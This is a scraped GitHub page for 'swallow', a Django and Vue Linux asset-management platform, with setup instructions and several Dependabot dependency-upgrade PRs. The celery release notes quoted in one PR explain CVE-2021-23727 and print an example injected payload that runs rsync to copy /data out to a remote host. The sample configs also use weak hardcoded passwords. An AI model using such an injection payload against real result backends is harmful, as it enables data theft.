一个后端基于django和DjangoRestFramework，前端基于vue和element-ui实现的CMBD运维平台

JiaJunZz, updated 🕥 2022-12-08 01:42:13

swallow

swallow是一个后端基于django和DjangoRestFramework，前端基于vue和element-ui实现的应用，主要面向linux运维工程师使用，管理linux资产信息。

演示

demo

功能特性

服务器信息自动定时采集
celery异步队列
RBAC基于角色的权限访问控制
RESTful API

技术栈

后端

前端

前序准备

你需要在本地linux服务器安装Python、MariaDB、Redis、nodejs、git、Ansible

开发环境部署

安装

```bash

克隆项目

git clone [email protected]:JiaJunZz/Swallow.git

进入项目目录

cd Swallow/

安装后端依赖

pip install -r requirements.txt

进入前端目录

cd web/

安装前端依赖

npm install

如果node-sass安装失败再次执行

npm install node-sass --unsafe-perm ```

配置

配置文件Swallow/swallow/settings.py，修改连接数据库server的配置信息 ```python DATABASES = { 'default': { 'ENGINE': 'django.db.backends.mysql', 'NAME': 'swallow', 'USER': 'root', 'PASSWORD': '123456', 'HOST': '127.0.0.1', 'PORT': '3306', 'OPTIONS': { 'init_command': "SET sql_mode='STRICT_TRANS_TABLES'", }, } }

celery中间件 redis://redis服务所在的ip地址:端口/数据库号

BROKER_URL = 'redis:/127.0.0.1:6379'

celery结果返回，可用于跟踪结果

CELERY_RESULT_BACKEND = 'redis://127.0.0.1:6379'

管理用户

REQUEST_USERNAME = 'admin'

管理员用户密码

REQUEST_PASSWORD = 'admin123456'

获取token的url

REQUEST_TOKEN_URL = 'http://127.0.0.1:8000/api-token-auth/'

服务器数据自动提交的API接口

REQUEST_AUTOSERVER_URL = 'http://127.0.0.1:8000/serverauto/'

```

配置文件 swallow/web/config/dev.env.js，修改连接后端的IP地址和端口 js module.exports = merge(prodEnv, { NODE_ENV: '"development"', BASE_API: '"http://127.0.0.1:8000"', })

配置文件 swallow/web/config/index.js，修改浏览器登录的地址 js module.exports = { dev: { host: '192.168.123.173', port: 9528, }

修改配置文件 /etc/ansible/hosts，用于自动收集服务器信息 bash [swallow_servers] 192.168.123.168 ansible_python_interpreter="/usr/bin/python2"

启动程序

```bash cd swallow

迁移数据库，如果出现问题可以删除migrations/下migrations的py代码

python manage.py makemigrations python manage.py migrate

创建后台管理员用户

python manage.py createsuperuser python manage.py runserver 0.0.0.0:8000 celery -A swallow worker -B -l INFO cd web/ npm run dev ```

浏览器登录

http://192.168.123.173:9528/#/login

API router

http://127.0.0.1:8000 router

API Doc

http://127.0.0.1:8000/docs apidoc

Browsers support

Modern browsers and Internet Explorer 10+.

|
IE / Edge |
Firefox |
Chrome |
Safari | | --------- | --------- | --------- | --------- | | IE10, IE11, Edge| last 2 versions| last 2 versions| last 2 versions

License

MIT license.

Issues

Bump certifi from 2018.11.29 to 2022.12.7

opened on 2022-12-08 01:42:12 by dependabot[bot]

Bumps certifi from 2018.11.29 to 2022.12.7.

Commits

9e9e840 2022.12.07
b81bdb2 2022.09.24
939a28f 2022.09.14
aca828a 2022.06.15.2
de0eae1 Only use importlib.resources's new files() / Traversable API on Python ≥3.11 ...
b8eb5e9 2022.06.15.1
47fb7ab Fix deprecation warning on Python 3.11 (#199)
b0b48e0 fixes #198 -- update link in license
9d514b4 2022.06.15
4151e88 Add py.typed to MANIFEST.in to package in sdist (#196)
Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) - `@dependabot use these labels` will set the current labels as the default for future PRs for this repo and language - `@dependabot use these reviewers` will set the current reviewers as the default for future PRs for this repo and language - `@dependabot use these assignees` will set the current assignees as the default for future PRs for this repo and language - `@dependabot use this milestone` will set the current milestone as the default for future PRs for this repo and language You can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/JiaJunZz/swallow/network/alerts).

Bump paramiko from 2.4.2 to 2.10.1

opened on 2022-03-29 21:56:47 by dependabot[bot]

Bumps paramiko from 2.4.2 to 2.10.1.

Commits

286bd9f Cut 2.10.1
4c491e2 Fix CVE re: PKey.write_private_key chmod race
aa3cc6f Cut 2.10.0
e50e19f Fix up changelog entry with real links
02ad67e Helps to actually leverage your mocked system calls
29d7bf4 Clearly our agent stuff is not fully tested yet...
5fcb8da OpenSSH docs state %C should also work in IdentityFile and Match exec
1bf3dce Changelog enhancement
f6342fc Prettify, add %C as acceptable controlpath token, mock gethostname
3f3451f Add to changelog
Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

Bump ipython from 7.2.0 to 7.16.3

opened on 2022-01-21 19:45:02 by dependabot[bot]

Bumps ipython from 7.2.0 to 7.16.3.

Commits

d43c7c7 release 7.16.3
5fa1e40 Merge pull request from GHSA-pq7m-3gw7-gq5x
8df8971 back to dev
9f477b7 release 7.16.2
138f266 bring back release helper from master branch
5aa3634 Merge pull request #13341 from meeseeksmachine/auto-backport-of-pr-13335-on-7...
bcae8e0 Backport PR #13335: What's new 7.16.2
8fcdcd3 Pin Jedi to <0.17.2.
2486838 release 7.16.1
20bdc6f fix conda build
Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

Bump celery from 4.3.0 to 5.2.2

opened on 2022-01-06 22:30:58 by dependabot[bot]

Bumps celery from 4.3.0 to 5.2.2.

Release notes

Sourced from celery's releases.

5.2.2

Release date: 2021-12-26 16:30 P.M UTC+2:00

Release by: Omer Katz
Various documentation fixes.
Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:
{
      "exc_module": "os",
      'exc_type': "system",
      "exc_message": "rsync /data [email protected]:~/data"
}
According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
v5.2.1

Release date: 2021-11-16 8.55 P.M UTC+6:00

Release by: Asif Saif Uddin

Fix rstrip usage on bytes instance in ProxyLogger.

Pass logfile to ExecStop in celery.service example systemd file.

fix: reduce latency of AsyncResult.get under gevent (#7052)

Limit redis version: <4.0.0.

Bump min kombu version to 5.2.2.

Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

... (truncated)

Changelog

Sourced from celery's changelog.

5.2.2

:release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz
Various documentation fixes.
Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

.. code-block:: python
  {
        "exc_module": "os",
        'exc_type': "system",
        "exc_message": "rsync /data [email protected]:~/data"
  }
According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
.. _version-5.2.1:

5.2.1

:release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin

Fix rstrip usage on bytes instance in ProxyLogger.

Pass logfile to ExecStop in celery.service example systemd file.

fix: reduce latency of AsyncResult.get under gevent (#7052)

Limit redis version: <4.0.0.

Bump min kombu version to 5.2.2.

... (truncated)

Commits

b21c13d Bump version: 5.2.1 → 5.2.2
a60b486 Add changelog for 5.2.2.
3e5d630 Fix changelog formatting.
1f7ad7e Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).
2d8dbc2 Update configuration.rst
9596aba Fix typo in documentation
639ad83 update doc to reflect Celery 5.2.x (#7153)
d32356c Bump version: 5.2.0 → 5.2.1
6842a78 Merge branch 'master' of https://github.com/celery/celery
4c92cb7 changelog for v5.2.1
Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

Bump ansible from 2.7.9 to 4.2.0

opened on 2021-09-23 23:24:13 by dependabot[bot]

Bumps ansible from 2.7.9 to 4.2.0.

Commits

See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

Bump django from 2.1 to 2.2.24

opened on 2021-06-10 21:16:18 by dependabot[bot]

Bumps django from 2.1 to 2.2.24.

Commits

2da029d [2.2.x] Bumped version for 2.2.24 release.
f27c38a [2.2.x] Fixed CVE-2021-33571 -- Prevented leading zeros in IPv4 addresses.
053cc95 [2.2.x] Fixed CVE-2021-33203 -- Fixed potential path-traversal via admindocs'...
6229d87 [2.2.x] Confirmed release date for Django 2.2.24.
f163ad5 [2.2.x] Added stub release notes and date for Django 2.2.24.
bed1755 [2.2.x] Changed IRC references to Libera.Chat.
63f0d7a [2.2.x] Refs #32718 -- Fixed file_storage.test_generate_filename and model_fi...
5fe4970 [2.2.x] Post-release version bump.
61f814f [2.2.x] Bumped version for 2.2.23 release.
b8ecb06 [2.2.x] Fixed #32718 -- Relaxed file name validation in FileField.
Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

JiaJunZz

meat...code...Cola

GitHub Repository

django django-rest-framework cmbd vue element-ui